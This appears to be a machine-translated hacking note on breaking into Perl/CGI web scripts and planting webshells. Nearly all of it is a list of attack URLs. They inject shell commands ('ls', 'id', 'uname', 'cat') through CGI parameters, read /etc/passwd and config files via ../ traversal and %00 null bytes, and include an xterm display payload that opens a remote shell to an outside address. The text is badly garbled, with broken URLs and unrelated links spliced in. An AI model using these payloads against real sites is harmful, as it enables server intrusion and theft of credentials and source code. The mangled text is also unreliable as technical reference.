Research on CGI hack and webshell

The general idea is to skip the restriction and view sensitive and password-related files. Write a CGI statement and try to pass webshell to the background (if the background is verified or MD5 is used, try

Cookie spoofing, local submission), find executable directories and related functions, and use shell ......" Elevation of Privilege Thanks to the wisdom of EMM and PS and their superb script technology, as well as the old Red 4 script group, British and Foreign coolders Note" Most Perl script vulnerabilities are found in open (), system (), or ''calls. The former allows read/write and execution, and the latter two allow execution. If you send a table using the POST method, it cannot be crossed (% 00 will not be parsed), so most of us use get Http://target.com/cgi-bin/home/news/sub.pl? 12 arbitrary construction Http://target.com/cgi-bin/home/news/sub.pl? & Change the character. You may be able to execute it. Http://target.com/cgi-bin/home/news/sub.pl? 'LS' single quotes Http://target.com/cgi-bin/home/news/sub.pl? 'Id '; Http://target.com/cgi-bin/home/news/sub.pl? 'Ifs = !; Uname! -' Http://target.com/cgi-bin/home/news/sub.pl? 'Cat <; '/home1/siteadm/cgi-bin/home/news/Sub. pl' is a good idea. Let's show the code cat back. Http://target.com/test.pl;ls Http://target.com/index.cgi? Page = | LS +-La +/% 0aid % 0 awhich + xterm | Http://target.com/index.cgi? Page = | xterm +-isplay + 10.0.1.21: 0.0 + % 26 | Http://target.com/test.pl? The operation and command execution in 'id' is similar to that in ''. For example, cat <'/home1/siteadm/cgi-bin/home/news/test. pl ''shows the PL code. Http://target.com/index.cgi? Page =; Dir + C :\| & cid = 03417 SQL Injection similar to ASP Http://target.com/test.pl? & ....../Http://www.cnblogs.com/etc/passwd Http://www.target.org/cgi-bin/cl... info. pl? User =./Add./before test ./ Http://www.target.org/cgi-bin/cl... nfo. pl? User = test % 00. Note that % 00 will not be lost. Http://www.target.org/cgi-bin/cl... http://www.cnblogs.com/etc/passwd%00 Http://www.target.org/show.php? F ../include/config. php view PHP code Http://www.target.org/show.php? F... ng/admin/global. php One sentence for EMM and PS Http://www.target.org/cgi-bin/cl.../http://www.cnblogs.com/../bin/ls%20 > BBB % 20 | Http://www.target.org/cgi-bin/club/scripts+'less showpost. pl \ 'and find the \'/\ '\ 'select \' string Http://www.target.org/cgi-bin/cl... bin/sh. Elf? Ls +/HTTP here elf is a feature of the CCS Chinese Linux operating system Http://www.target.org/csapi/.?c0=afhttp/china.sh?#.elf= ?" + & + LS +/bin Script technology with the suffix of HTML continues to be dug deep, but it cannot be questioned that submitting data query statements is also a perfect method. Http://target.com/index.html#cmd.exe Http://target.com/index.html? Dummyparam = xp_mongoshell; Lynxhttp: // target.com/cgi-bin/htmlscript? Http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd;